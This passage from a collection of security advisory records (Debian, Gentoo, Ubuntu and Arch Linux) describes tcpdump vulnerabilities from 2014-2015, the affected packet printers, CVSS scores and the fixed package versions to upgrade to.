CVE-2014-9140\nDebian Bug : 770424 770434\n\nSeveral vulnerabilities have been discovered in tcpdump, a command-line\nnetwork traffic analyzer. 
These vulnerabilities might result in denial\nof service, leaking sensitive information from memory or, potentially,\nexecution of arbitrary code.\n\n", "modified": "2014-12-08T19:00:24", "published": "2014-12-08T19:00:24", "id": "DEBIAN:DLA-102-1:4756A", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201412/msg00005.html", "title": "[SECURITY] [DLA 102-1] tcpdump security update", "type": "debian", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-16T22:14:42", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3086-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nDecember 03, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tcpdump\nCVE ID : CVE-2014-8767 CVE-2014-8769 CVE-2014-9140\nDebian Bug : 770424 770434\n\nSeveral vulnerabilities have been discovered in tcpdump, a command-line\nnetwork traffic analyzer. 
These vulnerabilities might result in denial\nof service, leaking sensitive information from memory or, potentially,\nexecution of arbitrary code.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.3.0-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 4.6.2-3.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.6.2-3.\n\nWe recommend that you upgrade your tcpdump packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-12-03T19:16:46", "published": "2014-12-03T19:16:46", "id": "DEBIAN:DSA-3086-1:0C00E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00276.html", "title": "[SECURITY] [DSA 3086-1] tcpdump security update", "type": "debian", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:19", "bulletinFamily": "unix", "description": "### Background\n\ntcpdump is a tool for capturing and inspecting network traffic.\n\n### Description\n\nMultiple vulnerabilities have been discovered in tcpdump:\n\n * The olsr_print function contains an integer underflow error (CVE-2014-8767) \n * The geonet_print function contains multiple integer underflow errors (CVE-2014-8768) \n * The decoder for the Ad hoc On-Demand Distance Vector protocol contains an out-of-bounds memory access error (CVE-2014-8769) \n * The ppp_hdlc function contains a buffer overflow error (CVE-2014-9140) \n\n### Impact\n\nA remote attacker may be able to send a specially crafted packet, possibly resulting in execution of arbitrary code or a Denial of Service condition. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll tcpdump users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/tcpdump-4.6.2-r1\"", "modified": "2015-02-07T00:00:00", "published": "2015-02-07T00:00:00", "id": "GLSA-201502-05", "href": "https://security.gentoo.org/glsa/201502-05", "type": "gentoo", "title": "tcpdump: Multiple vulnerabilities", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:10:26", "bulletinFamily": "unix", "description": "Steffen Bauch discovered that tcpdump incorrectly handled printing OLSR packets. A remote attacker could use this issue to cause tcpdump to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2014-8767)\n\nSteffen Bauch discovered that tcpdump incorrectly handled printing GeoNet packets. A remote attacker could use this issue to cause tcpdump to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only applied to Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2014-8768)\n\nSteffen Bauch discovered that tcpdump incorrectly handled printing AODV packets. A remote attacker could use this issue to cause tcpdump to crash, resulting in a denial of service, reveal sensitive information, or possibly execute arbitrary code. (CVE-2014-8769)\n\nIt was discovered that tcpdump incorrectly handled printing PPP packets. A remote attacker could use this issue to cause tcpdump to crash, resulting in a denial of service, or possibly execute arbitrary code. 
(CVE-2014-9140)\n\nIn the default installation, attackers would be isolated by the tcpdump AppArmor profile.", "modified": "2014-12-04T00:00:00", "published": "2014-12-04T00:00:00", "id": "USN-2433-1", "href": "https://usn.ubuntu.com/2433-1/", "title": "tcpdump vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:38", "bulletinFamily": "unix", "description": "- CVE-2014-8767 (denial of service)\n\nInteger underflow in the olsr_print function when in verbose mode,\nallows remote attackers to cause a denial of service (crash) via a\ncrafted length value in an OLSR frame.\n\n- CVE-2014-8768 (denial of service)\n\nMultiple Integer underflows in the geonet_print function, when in\nverbose mode, allow remote attackers to cause a denial of service\n(segmentation fault and crash) via a crafted length value in a Geonet frame.\n\n- CVE-2014-8769 (out-of-bounds memory read)\n\nMight allow remote attackers to obtain sensitive information from memory\nor cause a denial of service (packet loss or segmentation fault) via a\ncrafted Ad hoc On-Demand Distance Vector (AODV) packet, which triggers\nan out-of-bounds memory access.\n\n- CVE-2014-9140 (denial of service)\n\nBuffer overflow in the ppp_hdlc function in print-ppp.c allows remote\nattackers to cause a denial of service (crash) via a crafted PPP packet\nor possibly execute arbitrary code.\n\n- CVE-2015-0261 (out-of-bounds memory read)\n\nIPv6 mobility printer mobility_opt_print() typecasting/signedness error\nwould handle "len" as "int" (=positive and negative numbers), instead of\n"unsigned int" (=only positive numbers). 
When calling\nmobility_opt_print() with a negative "len", the "i < len" check would\nnot be satisfied and it would not enter the loop and try to read from bp[i].\n\n- CVE-2015-2153 (arbitrary code execution)\n\nTCP printer problem with missing length check in the\nrpki_rtr_pdu_print() function in print-rpki-rtr.c when processing\nRPKI-RTR PDUs (Protocol Data Units) with an incorrect header length.\nWithout this check, the function will try to operate on invalid data\nwhen processing certain packets, leading to all kinds of unwanted side\neffects, including crashes due to invalid reads, writes and general\nmemory corruption. Due to the memory corruption aspect it may lead to\ncode execution.\n\n- CVE-2015-2154 (out-of-bounds memory read)\n\nEthernet printer osi_print_cksum() missing sanity checks in\nprint-isoclns.c. The function may call the create_osi_cksum() function\nin checksum.c with invalid data leading to out-of-bounds memory read.\n\n- CVE-2015-2155 (arbitrary code execution)\n\nA flaw was found in tcpdump's force printer. A remote attacker could use\nthis flaw to cause tcpdump to crash, resulting in a denial of service,\nor possibly execute arbitrary code.", "modified": "2015-03-20T00:00:00", "published": "2015-03-20T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-March/000261.html", "id": "ASA-201503-20", "title": "tcpdump: multiple issues", "type": "archlinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}